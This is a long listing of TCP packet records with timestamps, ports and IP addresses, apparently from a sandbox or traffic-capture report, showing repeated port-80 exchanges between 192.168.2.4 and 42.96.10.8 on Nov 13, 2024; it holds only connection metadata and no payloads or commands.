                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070779085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070801973 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070806980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070822001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070837021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070862055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070884943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.113513947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.113529921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.113545895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.113567114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.114573002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.114588022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.114614010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.114619017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.114629984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.114645958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.114655018 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.114661932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.114677906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.114690065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.114691973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.114722013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.167576075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.167593002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.167608976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.167634010 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.184107065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.184133053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.184148073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.184149981 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.184191942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.184195995 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.184209108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.184247971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.184637070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.184653044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.184667110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.184698105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.184779882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.184794903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.184809923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.184823036 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.184849024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.184979916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.184995890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185009956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185034990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185034990 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185051918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185069084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185074091 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185089111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185103893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185122967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185157061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185456991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185484886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185498953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185538054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185571909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185587883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185601950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185615063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185620070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185641050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185805082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185820103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185862064 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185869932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185887098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185900927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185909033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185923100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185930967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185930967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185951948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185960054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185976028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.185992002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186007023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186022043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186023951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186034918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186048985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186058998 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186065912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186081886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186089993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186099052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186106920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186121941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186137915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186161041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186167955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186177015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186180115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186192989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186218023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186218023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186237097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186253071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186256886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186269045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186284065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186295986 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186300039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186322927 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186371088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186386108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186402082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186414957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186417103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186439991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186534882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186569929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186582088 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186597109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186611891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.186641932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.227440119 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.229137897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.229162931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.229177952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.229204893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.230130911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.230165958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.230179071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.230195999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.230212927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.230226994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.230232000 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.230266094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.230319023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.230334997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.230349064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.230376959 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.274322033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.282974958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.283036947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.283049107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.283063889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.283080101 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.283108950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.299679041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.299704075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.299720049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.299734116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.299747944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.299748898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.299761057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.299776077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.299802065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300187111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300213099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300226927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300260067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300285101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300301075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300316095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300324917 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300332069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300359964 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300368071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300412893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300492048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300543070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300556898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300581932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300586939 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300599098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300621033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300642014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300657034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300678968 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300708055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300740957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300753117 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300756931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300807953 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300947905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300962925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300977945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.300995111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301008940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301009893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301029921 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301196098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301239967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301240921 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301256895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301295042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301305056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301321030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301336050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301352024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301357985 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301397085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301450014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301465988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301481962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301496983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301502943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301506042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301537037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301554918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301563025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301577091 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301578045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301623106 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301656961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301672935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301687956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301702976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301717997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301728964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301736116 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301747084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301814079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301846981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301862001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301876068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301902056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301903009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301919937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301935911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301939011 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301953077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301970005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.301973104 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.302006960 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.302010059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.302025080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.302058935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.302061081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.302073956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.302119017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.302242041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.302268982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.302284002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.302310944 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.344819069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.344835043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.344850063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.344862938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.344886065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.345755100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.345771074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.345784903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.345798969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.345812082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.345817089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.345832109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.345840931 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.345849037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.345861912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.345875978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.345877886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.345892906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.345896959 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.345930099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.398766041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.398780107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.398823977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.398854971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.398948908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.398988962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.415287971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.415303946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.415327072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.415343046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.415473938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.415491104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.415519953 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.415718079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.415733099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.415747881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.415769100 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.415790081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.415791988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.415807962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.415823936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.415844917 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.415977955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416006088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416018009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416021109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416054010 CET4973380192.168.2.442.96.10.8
